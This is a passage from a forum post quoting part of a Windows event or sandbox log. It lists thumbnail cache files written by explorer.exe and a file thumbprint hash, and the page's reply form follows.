C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] 27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556] Thumbprints 5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c </Data> </EventData> </Event> [/SPOILER] [/QUOTE]
Insert quotes…
Verification
Post reply
Top